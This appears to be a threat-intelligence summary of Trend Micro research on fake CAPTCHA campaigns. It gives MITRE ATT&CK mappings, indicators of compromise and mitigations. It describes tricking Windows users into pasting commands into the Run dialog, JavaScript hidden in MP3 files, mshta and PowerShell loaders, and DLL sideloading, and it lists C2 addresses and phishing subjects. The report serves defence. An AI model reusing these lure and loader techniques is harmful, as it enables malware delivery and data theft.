Trend Micro researchers uncovered new fake CAPTCHA campaigns leveraging disguised MP3 and HTML files that trick Windows users into running malicious scripts via the Run dialog, leading to data theft and remote access through malware like Lumma Stealer, Emmental, Rhadamanthys, AsyncRAT, and XWorm. These sophisticated attacks use phishing, SEO poisoning, and malvertising to deliver obfuscated, multistage payloads executed in-memory via mshta.exe and PowerShell, evading traditional detection. #FakeCAPTCHA #LummaStealer #Emmental #AsyncRAT #XWorm
Keypoints
- Fake CAPTCHA pages instruct victims to copy-paste obfuscated commands into Windows Run dialog (Win + R), triggering execution of malicious scripts via mshta.exe or PowerShell.
- Attackers embed highly obfuscated JavaScript inside otherwise legitimate MP3 files—originally from royalty-free sources—to deliver multi-stage payloads in-memory, evading file-based detection.
- Malware payloads include information stealers and remote access tools such as Lumma Stealer, Emmental, Rhadamanthys, AsyncRAT, and XWorm, often delivered via phishing emails, malvertising, SEO poisoning, and file-sharing services.
- Phishing campaigns use trusted-looking domains, formal language, and urgency-themed email subjects to lure users to fake CAPTCHA landing pages that appear as authentic human verification prompts.
- Attackers dynamically update URLs hosting malicious scripts to maintain campaign continuity despite remediation efforts.
- Infections involve execution of multi-stage PowerShell scripts, code injection into svchost.exe, DLL sideloading with fake executables, and establishing C&C communication via Chromium-based browsers and local web servers.
- Mitigation strategies include disabling Run dialog access, enforcing least privilege, restricting unapproved software and file-sharing services, monitoring clipboard and process activities, hardening browser settings, enabling memory protection, and investing in user security awareness and managed detection and response (MDR).
MITRE Techniques
- [T1204] User Execution – Users are socially engineered to paste malicious commands into the Windows Run dialog, enabling initial execution (‘…instructing users to copy and paste a malicious command in the Windows run dialog…’).
- [T1047] Windows Management Instrumentation – Execution of mshta.exe to run HTML Application (HTA) files and embedded scripts (‘…mshta.exe executes the file lyricalsync.mp3 containing obfuscated JavaScript…’).
- [T1059] Command and Scripting Interpreter – Use of PowerShell with encoded and obfuscated commands to remotely download and execute payloads (‘…PowerShell.exe runs base64-encoded payload downloaded from remote URLs…’).
- [T1105] Ingress Tool Transfer – Malicious scripts download additional payloads such as Lumma Stealer and others through HTTP(S) requests (‘…connects to URLs like bi.yuoie[.]shop and mediafire.com to download obfuscated payloads…’).
- [T1055] Process Injection – The PowerShell script injects code into svchost.exe to execute further components (‘…performs code injection to svchost.exe, which spawns legitimate-looking processes…’).
- [T1218] Signed Binary Proxy Execution – Abuse of legitimate Windows binaries such as mshta.exe and PowerShell.exe to execute malicious scripts (‘…continued use of mshta.exe and PowerShell is due to their accessibility and ability to evade detection…’).
- [T1071] Application Layer Protocol – Use of C&C communication over HTTP on localhost and remote servers via Chromium browsers (‘…launches Chromium-based browsers to open local webserver http://127.0.0.1:8000/…’).
- [T1574] Hijack Execution Flow – DLL sideloading via AvastBrowserUpdate.exe and goopdate.dll to execute malicious code (‘…loading a malicious DLL file goopdate.dll using DLL sideloading…’).
Indicators of Compromise
- [URLs] Fake CAPTCHA landing pages and payload hosting – ernier[.]shop/lyricalsync[.]mp3, guest-idreserve[.]com, bi.yuoie[.]shop/750413b4e6897a671bc759e04597952a0be747830189873b.xlsx, mediafire[.]com/download2431
- [File Hashes] Obfuscated malicious scripts detected as Trojan.JS.EMMENHTAL.SM and PUA.Win32.FakeGoop.A.component – hash samples in attached reports (and 3 more hashes)
- [File Names] Lyricalsync.mp3 (malicious MP3 with embedded JavaScript), AvastBrowserUpdate.exe (malicious executable), goopdate.dll (malicious DLL sideloaded), 750413b4e6897a671bc759e04597952a0be747830189873b.xlsx (malicious PowerShell script disguised as XLSX)
- [IP Addresses] Command and control server – 176.65.141.165:8587, 185.7.214.108 (AsyncRAT/XWorm hosting), and others linked to malware distribution infrastructure
- [Email Subjects] Phishing themes – “Action Required – Guest’s Valuable Items Left Behind”, “Security Alert: Guest’s Laptop and Phone Left at Property”, “Urgent Attention – Guest Items at Your Hotel”
Read more: https://www.trendmicro.com/en_us/research/25/e/unmasking-fake-captcha-cases.html